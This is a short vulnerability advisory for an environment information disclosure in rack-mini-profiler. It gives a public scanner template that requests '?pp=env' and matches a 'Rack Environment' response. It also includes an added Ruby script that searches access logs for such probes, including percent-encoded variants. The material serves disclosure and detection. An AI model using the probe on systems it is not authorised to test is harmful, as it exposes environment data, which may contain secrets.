rack-mini-profiler: rack-mini-profiler - Environment Information Disclosure

Date: 2025-08-01 | Affected software: rack-mini-profiler | PoC: public

Vulnerability description

rack-mini-profiler is prone to environment information disclosure, which could help an attacker formulate additional attacks.

PoC code [public]

id: rack-mini-profiler

info:
  name: rack-mini-profiler - Environment Information Disclosure
  author: vzamanillo
  severity: high
  description: rack-mini-profiler is prone to environmental information disclosure which could help an attacker formulate additional attacks.
  metadata:
    max-request: 1
  tags: config,debug,rails,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?pp=env"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Rack Environment"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220223820f9e8c9cf348101d8fc81414bef85889ba47a0f959235304fe15cf8a3fa022100c66fba4a071c53e12208acc22dd04fbe2a76bc7a62910bd3da7337fce5729daf:922c64590222798bb761d5b6d8e72950
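
A defender-side check for the request the template above sends, as an added example that is not part of the original page or of rack-mini-profiler: it scans web access logs for requests whose `pp` query parameter decodes to `env` and separates those answered with 200 from the rest. The log lines are constructed samples, the combined log format is an assumption, and the names `pp_value` and `find_pp_env_requests` are hypothetical.

```ruby
require "uri"

# Constructed sample access-log lines (combined log format assumed), not from the page.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /?pp=env HTTP/1.1" 200 18342 "-" "curl/8.5.0"
  203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "GET /products?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  198.51.100.9 - - [01/Aug/2025:10:00:05 +0000] "GET /dashboard?tab=1&pp=%65nv HTTP/1.1" 200 17990 "-" "Mozilla/5.0"
  198.51.100.9 - - [01/Aug/2025:10:00:09 +0000] "GET /?pp=env HTTP/1.1" 404 153 "-" "Mozilla/5.0"
  192.0.2.44 - - [01/Aug/2025:10:00:12 +0000] "GET /search?q=app%3Denv HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
LOG

LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3}) /

# Returns the percent-decoded value of the pp query parameter,
# or nil when the parameter is absent or the query is not ASCII.
def pp_value(target)
  query = target.split("?", 2)[1]
  return nil unless query
  URI.decode_www_form(query).to_h["pp"]
rescue ArgumentError
  nil
end

# Flags requests for the profiler's environment page on any path.
# Logs carry no response body, so a 200 is only an indication that the
# "Rack Environment" page was served; confirm against the application itself.
def find_pp_env_requests(log_text)
  log_text.each_line.filter_map do |line|
    m = LINE_RE.match(line) or next
    next unless pp_value(m[:target]) == "env"
    { ip: m[:ip], time: m[:time], target: m[:target],
      status: m[:status].to_i, exposed: m[:status] == "200" }
  end
end

if __FILE__ == $PROGRAM_NAME
  find_pp_env_requests(SAMPLE_LOG).each do |hit|
    label = hit[:exposed] ? "LIKELY EXPOSED" : "probe only"
    puts "#{hit[:time]} #{hit[:ip]} #{hit[:target]} -> #{hit[:status]} (#{label})"
  end
end
```

Decoding the query before comparing catches percent-encoded variants such as `pp=%65nv` and avoids false hits on parameters whose value merely contains `pp=env`.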
